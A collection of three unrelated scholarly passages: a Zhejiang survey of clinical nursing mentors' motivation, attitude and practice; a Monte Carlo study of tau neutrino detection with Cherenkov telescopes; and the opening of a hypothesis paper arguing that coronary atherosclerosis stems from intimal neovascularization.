In response to expert feedback, modifications were made to enhance the clarity and precision of the questionnaire.First, terms such as 'newcomer' , 'new nurse' , and 'apprentice' were standardized to 'new nurse/ intern nurse' throughout the questionnaire.This change ensured consistency and clarity.Second, certain question stems were rephrased for better accuracy.For example, the phrase 'the extent of the hospital's psychological care for mentoring nurses' was altered to 'the frequency of the hospital's psychological care for mentoring nurses' .This adjustment provided a more direct measure of the hospital's support in this area.Additionally, at the beginning of the questionnaire, a clear definition of a 'nursing mentor' was introduced, which served to screen participants for the study accurately.Participants were asked to confirm whether they currently serve or have previously served as clinical nursing mentors.Furthermore, two open-ended questions were added to gain deeper insights into the mentors' perspectives.These questions revolve around the mentors' comprehensive evaluation of their apprentices, specifically asking about aspects they deemed most and least important: practical skills, communication skills, work attitude, learning ability, or innovative spirit.These additions aimed to explore the priorities and values of mentors in their mentorship roles, thus offering a nuanced understanding of their approach to mentorship.
The motivation dimension comprised 8 questions, each evaluated on a five-point Likert scale ranging from strongly disagree [1] to strongly agree [5], resulting in a score range of 8-40.The attitude dimension consisted of 22 questions, evaluated on a five-point Likert scale with scores ranging from strongly disagree [1] to strongly agree [5], yielding a score range of 22-110.The practice dimension featured 11 questions, evaluated on a fivepoint Likert scale with response options ranging from always [5] to never [1], and scores ranging from 11 to 55. Notably, three practice questions were open-ended and not assigned numerical scores.Scores > 70% of the maximum in each section indicated adequate motivation, positive attitude, and proactive practice [9].
The formal experimental data analysis revealed strong internal consistency with a Cronbach's α coefficient of 0.883 and a Kaiser-Meyer-Olkin (KMO) value of 0.918, confirming the reliability and suitability of the questionnaire for the research study.
The sample size for our study was calculated using a standard statistical formula.With a confidence level of 95% (z = 1.96), an estimated proportion (p) of 0.5, and a margin of error (e) of 0.05, the formula n = z 2 * p * (1p) / e 2 yielded a sample size of approximately 384 [10].However, to account for potentially unusable responses, a non-response rate of 10% was considered, and we aimed to collect > 500 questionnaires.This study employed a convenient sampling approach to select 30 hospitals in 8 cities within Zhejiang province.The hospitals were chosen based on their qualification for clinical internship mentoring and their minimum classification at the secondary level.The distribution of questionnaires to clinical nursing mentors within these hospitals was facilitated through the hospital's nursing department clinical practice management personnel, utilizing the WeChat platform.There was an estimated pool of approximately 5,000 internship mentors among the selected hospitals.The allocation of questionnaires was proportional to the number of hospital beds.Hospitals with < 1,000 beds received approximately 5-10 questionnaires, those with 1,000-2,000 beds were assigned 10-20 questionnaires, and hospitals with > 2,000 beds received 20-50 questionnaires.A total of 643 questionnaires were distributed, with 25 individuals declining to participate, resulting in 618 collected questionnaires.After excluding 37 questionnaires with a completion time of < 120 s or > 3,600 s, 82 questionnaires that were completed by individuals who had never served as clinical nursing mentors, and 4 questionnaires with repeated IP addresses, a total of 495 valid questionnaires were included in the statistical analysis.
Statistical analysis
Statistical analysis was conducted using SPSS 23.The respondents' demographic information and their scores across various dimensions were subjected to descriptive analysis.The median, 25th percentile, and 75th percentile were used to present these data.For different demographic characteristics, count data was represented as N (%).In terms of comparing the differences in dimension scores among survey participants with varying demographic characteristics, the Wilcoxon-Mann-Whitney test was employed for comparisons between the two groups.For continuous variables across three or more groups, the Kruskal-Wallis variance analysis method was used.The Spearman correlation coefficient was applied to analyze the correlation between scores across different dimensions.In both univariate and multivariate regression analyses, dimension scores were used as dependent variables to analyze their relationship with demographic data.In multivariate analysis, the median score was used as the cut-off value.A stepwise approach was adopted for selecting model variables.Variables with a significance level of P < 0.1 in univariate analysis were initially included.In this analysis, P-values were retained to three decimal places, with P < 0.05 representing statistical significance.
Results
The general characteristics of the participants A total of 495 valid questionnaires were collected.Among them, most participants were 30-39 years old (68.7%); 98% were female, 92.9% had undergraduate or higher educational levels, and 68.1% held professional titles at an intermediate and senior level.The participants had varying years of nursing experience, with the majority falling within the 6-15 years (66.7%).There were 65% who served as nursing supervisors for 3-10 years, and over half of the nursing mentors had guided more than 11 apprentices.Also, 74.3% came from Tertiary A hospitals, 84.8% became nursing mentors through organizational arrangements, and 81.4% had undergone training related to mentoring (Table 1).
Motivation, attitude, and practice scores and distribution across different populations
The research population had an average motivation score of 29/40 [26,32], an attitude score of 87/110 (82, 94), and an average practice score of 41/55 (38, 45).Nursing mentors with a primary professional title had significantly higher motivation scores than those with intermediate or advanced professional titles (P = 0.035).Significant differences in attitude scores were observed among nursing mentors with varying years of nursing experience, years of nursing supervision, and the number of apprentices they guided (P < 0.05).Differences in motivation scores were statistically significant among nursing mentors based on the pathways they took to become mentors (P = 0.033).Participation in training and the frequency of hospitals providing compensation subsidies to nursing mentors significantly differed among groups regarding mentoring motivation, attitude, and practice (P < 0.01).The level of financial support from hospitals for nursing mentoring, the frequency of psychological care provided by hospitals to nursing mentors, and the frequency at which hospitals were aware of mentoring issues significantly differed in mentoring motivation, attitude, and practice scores (P < 0.001) (Table 1).
In terms of their motivation for mentoring, a considerable 37.8% expressed uncertainty regarding whether it was driven by aspirations for professional advancement (M1).Interestingly, 64.6% strongly disagreed or expressed disagreement with the idea that it was primarily for financial gain (M2).A noTable 36.6% indicated that their mentoring involvement was spurred by organizational assignments (M3).Impressively, a significant 86.7% perceived new nurses/interns not merely as apprentices but as collaborative working partners (M4).An overwhelming 95.5% affirmed that their motivation was rooted in facilitating the swift competence development of newcomers in the nursing field (M5).Furthermore, 62% were motivated by a desire to delve into the intricacies of nursing workforce development (M6).A striking 90.3% named their commitment to preserving the essence of nursing professionalism as a pivotal motivation (M7).Moreover, 83.5% expressed a noble intention to instill a passion for the profession in the hearts of the novices (Table 2).
The participants displayed diverse attitudes, with 43.6% either not perceiving or being uncertain about the personal benefits of mentoring new nurses/interns (A2).Interestingly, 19% viewed mentoring as time-consuming (A3), and an equal proportion found reporting and recording procedures cumbersome, which somewhat diminished their enthusiasm for mentoring (A4).On a positive note, 57.2% believed that mentoring could alleviate their workload through the contributions of newcomers (A5).Additionally, a respective 89.5% and 94% derived happiness (A13) and a sense of being valued (A14) from the growth of the mentees.Impressively, 96.7% expressed a keen interest in sharing their accumulated experiences and lessons with the younger generations (A19).Another significant majority, i.e., 95.5% (A20), displayed genuine concern for new nurses/interns, drawing from their past experiences (Table 3).
Regarding practice, 87.0% of respondents consistently and frequently adapted their mentoring approaches based on the distinct personalities of new nurses/interns (P1).Furthermore, 82.6% affirmed that the mentoring process compelled them to continually enhance their nursing knowledge and overall competence to varying degrees (P5), with a commendable 33.9% never contemplating giving up (P6).Surprisingly, 42.0% never selected mentees based on personal preferences (P7), and 43.2% maintained patience, even in the face of repeated poor performance by the newcomer (P8).Significantly, 73.8% advocated exposing the newcomer to a higher frequency of clinical practice (P10).A noteworthy 48.1% reported encountering conflicts between their mentoring responsibilities and clinical duties (P11).Regarding the overall evaluation of mentored new nurses/interns, 57.4% regarded work attitude as the most crucial factor (P13), whereas 67.3% deemed a creative spirit as less essential (P14) (Table 4).
Correlation analysis of motivation, attitude, and practice
Correlation analyses further showed that the motivation scores were positively correlated with attitude scores (r = 0.498, P < 0.001) and practice scores (r = 0.408, P = 0.001), and attitude scores were also positively correlated with practice scores (r = 0.554, P < 0.001) (Table 5).The frequency of psychological care provided by the hospital resulted as a significant factor associated with nursing mentoring motivation, attitude, and practice, i.e., the higher the frequency of nursing mentors receiving psychological care from their hospital, the higher the probability of having a higher score.Compared to nursing mentors who did not participate in training, those who participated had a higher probability of having higher practice scores (OR = 2.908, 95% CI: [1.430, 5.913], P = 0.003).Compared to a higher frequency of job evaluations in hospitals, a lower frequency was a risk factor for nursing mentors having a higher probability of practice scores ("Often": OR = 0.416, 95% CI: [0.244-0.709],P = 0.001 and "Sometimes": OR = 0.346, 95% CI: [0.184-0.650],P = 0.001) (Table 6).
Discussion
The present study revealed that clinical nursing mentors in Zhejiang province, a multi-center research location in China's economically advanced eastern coastal region, had adequate motivation, positive attitude, proactive practice towards mentoring, and other associated factors.Our findings emphasize the importance of enhancing clinical nursing mentorship.By prioritizing mentor training, fostering a supportive environment with consistent psychological care, and promoting structured mentorship activities, nursing mentors' motivation, attitude, and practice could be significantly improved.
Our results showed that clinical nursing mentors had generally positive motivation, attitude, and proactive practice levels, which is consistent with the findings of the previous study, revealing that clinical mentors had high levels of motivation and a positive attitude towards their mentees that fostered a supportive mentorship environment [11].Several factors were found to influence the motivation, attitude, and practice of nursing mentors, including the mentor's professional title, years of experience, the number of apprentices they guide, and how they became mentors.Additionally, participation in training, compensation subsidies from hospitals, financial support, psychological care, and awareness of mentoring issues by hospitals all shaped mentors' motivation, attitude, and practice.Our findings are consistent with previous studies, emphasizing the importance of institutional support and mentor training programs in improving mentorship quality [12,13].
Our results indicated that the probability of higher motivation scores among nursing mentors varied depending on their experience and the type of hospital in which they worked.Moreover, it is essential to recognize that the probability of achieving higher motivation scores was not consistent across different mentorship experience levels.Mentors with more experience may need specific interventions to maintain their motivation.The frequency of psychological care provided by hospitals was a crucial factor affecting nursing mentoring motivation, attitude, and practice scores.Moreover, participation in training significantly affected the practice scores of nursing mentors, just as the assessment frequency, which underlines the importance of providing mentors with the necessary support and training to enhance their practice, thus increasing the quality of nursing mentorship [14].In order to improve clinical practice in nursing mentorship, it is crucial to recognize the significance of mentor experience, the role of hospitals, and the need for ongoing training and support [15,16].By implementing targeted initiatives, healthcare institutions can enhance the quality of clinical nursing mentorship, ultimately contributing to developing a skilled and motivated nursing workforce [17,18].The responses in the motivation dimension reveal the nurses' attitudes towards mentoring new nurses/interns.Nurses have diverse motivations for mentoring; for instance, some saw mentoring as a means of advancing their careers, while others did it out of a sense of duty to the organization.One objective way to improve clinical practice could be to encourage nurses to view mentoring as an opportunity for professional growth rather than just a responsibility [19,20].This shift in mindset may lead to more engaged and effective mentoring, ultimately benefiting both mentors and mentees.
The attitude dimension clarifies how the nursing mentor system is perceived and affects work-life balance.Many respondents believed mentoring could help coordinate scheduling, work-family balance, and relationships between new nurses/interns and colleagues.However, they also had concerns about the time and effort required for mentoring.An objective statement to enhance clinical practice is to emphasize the potential benefits of mentoring, such as the development of relationships and the discovery of talent [21,22].Institutions could provide resources and support to help mentors effectively manage their time, thus ensuring that mentoring does not become overly burdensome [23,24].
The practice dimension focuses on the actions and behaviors of mentors during the mentoring process.Respondents were willing to adjust their guidance methods, seek help when needed, and continuously enhance their nursing knowledge.However, some expressed occasional impatience, and conflicts between mentoring and clinical work were not uncommon.The comprehensive evaluation of new nurses/interns involves various aspects, including hands-on ability, communication ability, work attitude, learning ability, and creative spirit.The weight assigned to these aspects varied among mentors.In order to improve clinical practice, it is essential to provide mentors with training and resources to manage mentoring challenges while maintaining their own clinical responsibilities [25].Additionally, emphasizing the importance of patience, constructive guidance, and clinical exposure for new nurses/interns can promote a more positive mentoring experience [26,27].It is also recommended that standardized evaluation criteria be developed based on a balanced assessment of these attributes [28].
Our results revealed significant positive correlations among the dimensions of motivation, attitude, and practice scores in nursing mentorship.Specifically, nurses who exhibited higher levels of motivation were more likely to maintain positive attitudes toward mentoring, and those with positive attitudes were more likely to demonstrate effective mentoring practices.This interconnectedness underscores the importance of nurturing motivation among mentors, as it serves as a catalyst for fostering constructive attitudes and productive mentorship practices [29,30].Healthcare institutions should recognize the holistic nature of mentorship and aim to create an environment that encourages and sustains motivation while also providing mentorship training and support to enhance attitudes and practices [31,32].
By examining nursing mentors' motivations, attitudes, and practices, this study furthered the understanding of clinical nursing mentorship in Zhejiang Province, China.Its focus on an economically developed region provided insights into how regional factors influence mentorship, a topic that has not been widely covered in previous research.The present study also highlighted the importance of mentor training, psychological care, and structured mentorship activities, offering practical suggestions for improving mentorship programs.
The present study has some limitations, including its regional focus and sampling method.The reported findings, based solely on data from Zhejiang Province, may not apply to areas with different economic and cultural settings.Also, the sample that was drawn from 30 hospitals in one province might not fully represent all nursing mentors, potentially affecting the generalizability of the results.Therefore, while the study provides valuable regional insights, its applicability to other contexts is limited.Future research could benefit from a broader geographical range and a more diverse sampling to better represent the experience of nursing mentors.Clinical nursing mentors had adequate motivation, positive attitudes and proactive practice towards mentoring and associated factors.Our results underscore several key recommendations for enhancing clinical nursing mentorship in practice.First, institutions should prioritize mentorship training programs to bolster clinical nursing mentors' motivation, attitude, and practice, especially for those in intermediate and senior roles.Additionally, fostering a supportive institutional environment where psychological care is consistently provided can positively impact nursing mentors' motivation, attitude, and practice.Moreover, addressing concerns and providing structured mentorship activities for individuals with lower probability ratings can significantly improve the quality and efficacy of mentorship in nursing.
Table 1
Participants' baseline information and distribution of motivation, attitude, and practice scores
Table 2
Responses to motivation dimension
Table 3
Responses to attitude dimension
Table 4
Responses to practice dimension
Table 5
Correlation of scores on the dimensions of motivation, attitude and practice
Table 6
Logistic regression analysis of the dimensions of motivation, attitude, and practice | 2024-01-31T06:17:07.544Z | 2024-01-30T00:00:00.000 | {
"year": 2024,
"sha1": "86bd0b09c9b8099fd29746062f1e55778c717fd2",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "55292a21cbb1b70c4b85c2ab2b2e3b1f35461dce",
"s2fieldsofstudy": [
"Education",
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
117909360 | pes2o/s2orc | v3-fos-license | Tau neutrino search with Cherenkov telescopes
Cherenkov telescopes could have the capability of detecting high energy tau neutrinos by searching for very inclined showers. If a tau lepton, produced by a tau neutrino, escapes from the Earth crust, it will decay and initiate an air shower which can be detected by a fluorescence/Cherenkov telescope. Here we present a detailed Monte Carlo simulation of event rates induced by tau neutrinos in the energy range from 1 PeV to 1 EeV. Topographic conditions are taken into account for a set of example locations. As expected, we find a neutrino sensitivity which depends on the shape of the energy spectrum from astrophysical sources. We compare our findings with the sensitivity of the dedicated IceCube neutrino telescope under different conditions. We also find that a difference of several factors can be observed depending on the topographic conditions of the sites sampled.
Introduction
Many models which try to explain the origin of the ultra high energy cosmic rays (UHECR) claim that their might be produced by Active Galactic Nuclei (AGN) and Gamma Ray Bursts (GRB). Most of these models also predict a significant flux of high energy neutrinos from decay of charged pions. The chance of discovering extraterrestrial signals (neutrinos) from these objectes largely varies with source classes and model predictions. For what concerns Blazars for example [1] Flat Spectrum Radio Quasars (FSRQ) are more promising, than BL-Lac objects, whereas in [2] the opposite is predicted. The proton blazar model [3] predicts that the Low synchrotron peaked BL-Lacs (LBL) are more likely to produce a significant neutrino emission than the High synchrotron peaked BL-Lacs (HBL). On the other hand in [1] the considered p-γ model leads to the conclusion that FSRQs bright in the GeV range are promising neutrino sources without any assumption on the spectral index.
From this point of view, detection of individual flares from AGNs, on the time scale of days or weeks can be more or less feasible for cubic-km scale neutrino telescopes like IceCube, based on different predictions for the mechanism yielding the observed electromagnetic emission at high energies.
The highest energy neutrinos are expected to be born as muon and electron neutrinos, but due to vacuum oscillations a flux of high energy cosmic neutrinos at Earth is expected to be almost equally distributed among the three neutrino flavors. Due to their low interaction probability, neutrinos need to interact with a large amount of matter in order to be possibly detected. The atmosphere and the Earth offer such a target. Since the Earth is not transparent for neutrinos at the highest energies, one of the detection techniques is based on the development of extensive air showers (EAS) in the atmosphere. In air, very inclined EAS can be detected only by instruments observing a large volume. Propagating through the Earth only the so-called Earth skimming tau neutrinos may initiate detectable air showers above the ground. A successfull detection of such showers requires a ground array detector having a large ac-ceptance, of the order of one km 2 and a great sensitivity to horizontal showers such as the Pierre Auger Observatory, which is sensitive to tau neutrinos in the EeV energy range [4]. However, the detection of PeV tau neutrinos (expected to be produced by AGNs and GRBs) through optical signals would also seem to be possible. A combination of fluorescence light and Cherenkov light detector in the shadow of steep cliff could achievie this goal [5]. Recently, it was also shown, that such kind of experiments could be sensitive to tau neutrinos from fast transient objects like nearby GRBs [6].
In this work we investigate the detection of high energy tau neutrinos in the energy range from PeVs to EeVs by searching for very inclined showers using Cherenkov telescopes. We have performed detailed Monte Carlo (MC) simulations of expected tau neutrino event rates, including local topographic conditions, for La Palma, i.e. the location of the MAGIC telescopes [7] and sample selection of few sites proposed for the Cherenkov Telescope Array (CTA) [8]. Results are shown for a few representative neutrino fluxes expected for giant flares from AGNs.
Method
The propagation of a given neutrino flux through the Earth and the atmosphere is simulated using an extended version of the code ANIS [9].
For fixed neutrino energies, 10 6 events are generated on top of the atmosphere with zenith angles (θ ) in the range 90 • -105 • (up-going showers) and with azimuth angles in the range 0 • -360 • . Neutrinos are propagated along their trajectories of length ∆L from the generation point on top of the atmosphere to the backside of the detector in steps of ∆L/1000 (≥ 6 km). At each step of propagation, the ν-nucleon interaction probability is calculated according to different parametrization of its cross section based on the chosen parton distribution function (PDF). In particular, the propagation of tau leptons through the Earth is simulated with different energy loss models. All the computations are done using digital elevation maps (DEM) [10] to model the surrounding mass distribution of each consid- . The acceptance for a given initial neutrino energy E ν τ is given by: where N gen is the number of generated neutrino events and N k is the number of τ leptons with energy E τ larger then the threshold E th > 1 PeV and decay vertex position inside the detector volume. P(E ν τ , E τ , θ ) is the probability that a neutrino with energy E ν τ and crossing the distance ∆l would produce a particle with an energy E τ (this probability was used as "weight" of the event), A i (θ ) is the cross-sectional area of the detector volume seen by the neutrino, ∆Ω is the space angle. The T eff (E τ , x, y, h, θ ) is the trigger efficiency for tau lepton induced showers with first interaction position (x, y) and height (h) above the ground. The trigger efficiency depends on the response of a given detector, and is usually estimated based on MC simulations. In this work we used an average trigger efficiency extracted from [6], namely T eff = 10%, which is comparable with what calculated for up-going tau neutrino showers studied in [5]. This is a qualitative estimation and as such it is the major source of uncertanties on the results presented hereafter.
Eq. (1) gives the acceptance for diffuse neutrinos. The acceptance for a given point source could be estimated as the ratio between the diffuse acceptance and the solid angle covered by the diffuse analysis, multiplied by the fraction of time the source is visible f vis (δ s , φ site ) with the aperture defined in the beginning. This fraction depends on source declination (δ s ) and the latitude of the observing site (φ ). In this work the point source acceptance is calculated as: Figure 2 a compilation of fluxes expected from AGN flares are shown. Flux-1 and Flux-2 are calculations for the February 23, 2006 γ-ray flare of 3C 279 [11]. Flux-3 and Flux 4 predictions for PKS 2155-304 in low-state and high-state, respectively [12]. Flux-5 corresponds to a prediction for 3C 279 calculated in [13]. The flux labeled as GRB corresponds to the recent limit on the neutrino emission from GRBs reported by the IceCube Collaboration [14].
The total observable rates (number of expected events) were calculated as is the neutrino flux and ∆T an arbitrary observation time (3 hours in Table 1). [18] cross-section, with f vis = 100%, ∆Ω = 2π(cos(90 • ) − cos(105 • )) = 1.6262 and ∆T = 3 hours. The rate are calculated with the point source acceptances shown in Figure 3. Figure 3: Acceptance, A PS (E ν τ ) to earth-skimming tau neutrinos as estimated for the La Palma site and a sample selection of few CTA sites (with a trigger efficiency of 10%) and IceCube (with correct efficiency, as extracted from [15]).
Results
be observed between the expected rate and the local topography i.e. the expected number of events from South-East is usually larger than from other directions, due to largest amount of matter encountered by incoming neutrinos when coming from the South-East direction. For tau lepton energies between 10 16 eV and 10 17 eV the decay length is a few kilometers, so detectable events should mainly come from local hills from La Palma Island when considering the location of MAGIC. While for tau leptons energies between 10 18 eV and 10 19 eV the decay length is larger than 50 km, so that the matter distribution of other Canary Islands can also slightly contribute. In Figure 3 we show the estimated point source acceptance for the La Palma site and other possible locations as a function of the neutrino energy together with the IceCube acceptance as extracted from [15]. We stress at this point that we aim at exploring the effect of different topographic conditions rather than providing a comprehensive survey of potential sites.
The IceCube acceptance shows an increase for energies between 10 6 GeV and 10 9 GeV, and is on average about 2 × 10 −3 km 2 . A potential detector located in La Palma with an average trigger efficiency of 10% can have an acceptance as large as a factor 5 greater than IceCube (Northern Sky) at energies larger than ∼ 5 × 10 7 GeV. Indeed, for neutrino fluxes covering the energy range below ∼ 5 × 10 7 GeV (Flux-1, Flux-2, Flux-5 and GRB) the number of expected events is smaller than what estimated for IceCube assuming 3 hours of observation time. However, even in this energy range (see Table 1) similar rates can be obtained with a trigerr efficiency increased by a factor 2-3 compared to the rough estimate of 10%. For Flux-3 and Flux-4 the event rate is about a factor 2 larger than the realistic rate calculated for IceCube (Northern Sky). This indicates that Cherenkov telescopes could have a sensitivity comparable or even larger to neutrino telescopes such as IceCube in case of short neutrino flares (i.e. with a duration of about a few hours). For larger durations the advantage of neutrino telescopes as full sky no dead-time instruments will be relevant. An accurate simulation of the neutrino trigger efficiency for realistic Cherenkov telescopes is however needed. Table 1 also shows that for a GRB flux at the level of the current IceCube limit a trigger efficiency larger by at least a factor 10 compared to what we assumed here is needed.
An other interesting possibility, for the detection of upgoing tau neutrinos, is to built Cherenkov detectors at sites surrounded by mountains. Mountains can work as additional target and will lead to an enhancement of emerging tau leptons. A target mountain can also function as a shield to cosmic rays and star light.
In order to estimate the possible influence of mountains on the calculated event rate for up-going tau neutrinos, we performed a similar simulation as done for La Palma site for four sample locations: two in the Argentina (San Antonio, El Leoncito), one in Namibia (Kuibis) and one in the Canary Islands (Tenerife), see Table 2 and Figure 4. In case of sites surrounded by mountains (San Antonio, El Leoncito, Kuibis) results show an higher event rate (by at least a factor of 2) than for a site without surrounding mountains (La Palma and Tenerife). We also studied the influence on the expected event rate arising from uncertainties on the tau lepton energy loss. The average energy loss of taus per distance travelled (unit depth X in gcm 2 ) can be described as dE dX = α(E) + β (E)E. The factor α(E), which is nearly constant, is due to ionization β (E) is the sum of e + e − -pair production and bremsstrahlung, which are both well understood, and photonuclear scattering, which is not only the dominant contribution at high energies but at the same time subject to relatively large uncertainties. In this work the factor β τ are calculated using the following models describing contribution of photonuclear scattering: ALLM [16], BB/BS [22] and CMKT [23]. and different neutrino-nucleon cross-sections: GRV98lo [18], CTEQ66c [17], HP [19], ASSS [20], ASW [21]. Results are listed in Table 2 for Flux-1 and Flux-3. Table 3: Relative contributions to the systematic uncertainties on the up-going tau neutrino rate. As a reference value the expected event rate for La Palma site calculated for Flux-1 and Flux-3 (in brackets) was used. rate PDF β τ sum +14% (+42%) +2% (+7%) +14% (+43%) 2.8 × 10 −4 (8.6 × 10 −5 ) -2% (-7%) -7% (-14%) -7% (-16%)
Summary
In this paper detailed Monte Carlo simulation of event rate, including local topographic conditions of the detector, and using recent predictions for neutrino fluxes in AGN flares are presented for La Palma site and a few proposed CTA sites. The calculated neutrino rate is usually worse compared to what estimated for IceCube assuming realistic observation times spend by Cherenkov telescopes (a few hours). However for models which predict neutrino fluxes with energy above ∼ 5 × 10 17 eV, the sensitivity can be comparable to IceCube or even better. For the sites considered which have surrounding mountains the expected event rate is up to factor 5 higher compared to what expected for La Palma. | 2013-08-01T13:40:24.000Z | 2013-08-01T00:00:00.000 | {
"year": 2013,
"sha1": "3b8c824c885121861081f4cf5d6ec01f0a0fb7e4",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "ebcf004ff41cc70f2cf8a6eab201fb833ebe8750",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics"
]
} |
255961590 | pes2o/s2orc | v3-fos-license | Neovascularization of coronary tunica intima (DIT) is the cause of coronary atherosclerosis. Lipoproteins invade coronary intima via neovascularization from adventitial vasa vasorum, but not from the arterial lumen: a hypothesis
An accepted hypothesis states that coronary atherosclerosis (CA) is initiated by endothelial dysfunction due to inflammation and high levels of LDL-C, followed by deposition of lipids and macrophages from the luminal blood into the arterial intima, resulting in plaque formation. The success of statins in preventing CA promised much for extended protection and effective therapeutics. However, stalled progress in pharmaceutical treatment gives a good reason to review logical properties of the hypothesis underlining our efforts, and to reconsider whether our perception of CA is consistent with facts about the normal and diseased coronary artery. To begin with, it must be noted that the normal coronary intima is not a single-layer endothelium covering a thin acellular compartment, as claimed in most publications, but always appears as a multi-layer cellular compartment, or diffuse intimal thickening (DIT), in which cells are arranged in many layers. If low density lipoprotein cholesterol (LDL-C) invades the DIT from the coronary lumen, the initial depositions ought to be most proximal to blood, i.e. in the inner DIT. The facts show that the opposite is true, and lipids are initially deposited in the outer DIT. This contradiction is resolved by observing that the normal DIT is always avascular, receiving nutrients by diffusion from the lumen, whereas in CA the outer DIT is always neovascularized from adventitial vasa vasorum. The proteoglycan biglycan, confined to the outer DIT in both normal and diseased coronary arteries, has high binding capacity for LDL-C. However, the normal DIT is avascular and biglycan-LDL-C interactions are prevented by diffusion distance and LDL-C size (20 nm), whereas in CA, biglycan in the outer DIT can extract lipoproteins by direct contact with the blood. These facts lead to the single simplest explanation of all observations: (1) lipid deposition is initially localized in the outer DIT; (2) CA often develops at high blood LDL-C levels; (3) apparent CA can develop at lowered blood LDL-C levels. This mechanism is not unique to the coronary artery: for instance, the normally avascular cornea accumulates lipoproteins after neovascularization, resulting in lipid keratopathy. Neovascularization of the normally avascular coronary DIT by permeable vasculature from the adventitial vasa vasorum is the cause of LDL deposition and CA. DIT enlargement, seen in early CA and aging, causes hypoxia of the outer DIT and induces neovascularization. According to this alternative proposal, coronary atherosclerosis is not related to inflammation and can occur in individuals with normal circulating levels of LDL, consistent with research findings.
Hypothesis: Neovascularization of the normally avascular coronary DIT by permeable vasculature from the adventitial vasa vasorum is the cause of LDL deposition and CA. DIT enlargement, seen in early CA and aging, causes hypoxia of the outer DIT and induces neovascularization. According to this alternative proposal, coronary atherosclerosis is not related to inflammation and can occur in individuals with normal circulating levels of LDL, consistent with research findings.
Background
Atherosclerosis, the predominant cause of coronary artery disease, remains enigmatic. Despite best efforts, available therapies protect only 30-40% of individuals at risk, and no therapeutic cure is anticipated for those who currently suffer from the disease. Delayed progress concerning pharmaceutical treatment implies that atherosclerosis drug development is in jeopardy, raising concerns among experts [1].
This analysis addresses the logical properties of the hypothesis underlying our efforts, and reconsiders whether our perception of the disease is consistent with undisputed facts concerning coronary arteries in general and during disease in particular. A different perspective on the pathogenesis of atherosclerosis is proposed.
Logical properties and factual consistency concerning a currently endorsed hypothesis relating to coronary atherosclerosis: common perception of coronary artery morphology A currently endorsed hypothesis is based on the following assumptions: (1) atherosclerosis is a systemic disease, initiated by endothelial dysfunction due to (2) inflammation and (3) high levels of LDL, (4) leading to lipid and macrophage deposition in the tunica intima from blood of the coronary lumen, and plaque formation (modified responseto-injury hypothesis) [2,3]. This perception is presented in mainstream scientific publications and in educational materials, whether printed or electronic. This hypothesis is typically accompanied by familiar schematics depicting the pathogenesis of coronary atherosclerosis and transition from a normal cardiac artery to a diseased state, e.g. Figure 1: This perception of the mechanism of disease and similar schematics appear in wellrecognized scientific journals including Nature Medicine, Atherosclerosis, Thrombosis and Vascular Biology and etc. (e.g. [5]), and common educational materials such as the Britannica Online Encyclopaedia ( Figure 2): Therefore, this explanatory model concerning atherosclerosis, and accompanying schematics indistinguishable from that outlined above, are available in the majority of scientific publications and educational materials [2][3][4][5][6].
Assumption: atherosclerosis is an inflammatory disease
Varieties of microorganisms are present in advanced atherosclerotic lesions, for example in specimens removed during atherectomy [7]. Fabricant et al. induced visible atherosclerotic changes in chicken coronary arteries resembling that in humans, by infecting them with herpesvirus [8][9][10] and suggested the viral role in pathogenesis, a view shared by many scientists (for review see [11,12]). Mycoplasma pneumonia or Chlamydia pneumoniae infections alone [13] or together with influenza virus [14] have been proposed as contributory factors in the pathogenesis of atherosclerosis, and particularly by participation in obstruction of vasa vasorum [11]. However, these cases probably do not indicate the initiation of atherosclerosis, but are more likely to represent secondary infection of degenerating/ necrotic tissue. It should be emphasized that neither non-steroidal nor antibacterial antiinflammatory treatments alter the risk of coronary atherosclerosis [15][16][17][18]. Despite the aforementioned studies [7][8][9][10][11]13,14], therefore, it can reasonably be claimed that no infectious cause of atherosclerosis has been demonstrated [19,20].
Assumption: a high level of LDL initiates and is the main cause of atherosclerosis High levels of LDL are an important risk factor, and lowering LDL levels is the most significant pharmaceutical tool in coronary atherosclerosis prevention. However, the statement that high levels of LDL are the main cause of coronary atherosclerosis is inconsistent with established medical concepts.
Inconsistency with the established concept in medicine "Indeed, proof that a given condition always precedes or accompanies a phenomenon does not warrant concluding with certainty that a given condition is the immediate cause of that phenomenon. It must still be established that when this condition is removed, the phenomenon will no longer appear. . .." Claude Bernard [21].
As has been emphasized by numerous scientists, multiple factors participate during disease development, and can affect the progression and severity of disease. However, only through distinguishing the cause from all contributing factors can an effective cure, leading to disease eradication, be achieved.
". . . differentiating between cause and non-causative factors is essential. Elimination of the latter only ameliorates or reduces the incidence whereas elimination of the former eradicates the disease. Swamps are not a cause of malaria. Draining swamps may reduce the incidence of malaria but it is eradication of the malarial parasites that eliminates the disease. Reduction in incidence rather than elimination of the disease precludes a causal relationship." W. E. Stehbens [22]. Therefore, the fact that lowering LDL levels does not prevent cardiac events in 60-70% of individuals at risk [23] contradicts the causative role of LDL. Unfortunately, it appears that the scientific and medical communities are focusing on and emphasizing biomarkers that can predict risk, without proof that these biomarkers cause the risk [24,25].
Mechanisms of diseases constitute a new scientific field. However, although wellrecognized concepts are not always proved correct, the author believes that a new hypothesis should not contradict established concepts that have been proven as far as possible, without informed reasoning.
Factual discrepancies Lipid/macrophage pathogenesis of arteriosclerosis was suggested approximately one hundred years ago [26]. However, the hypothesis only gained proper attention during the 1970-80s, after a report concerning the Framingham Heart Study [27], culminating in joint NIH and American Heart Association publication of a Special Report [28], which was reprinted in all relevant journals [29][30][31][32][33]. The first Panel's Conclusion of the Report states: "Elevation of blood cholesterol levels is a major cause of coronary artery disease".
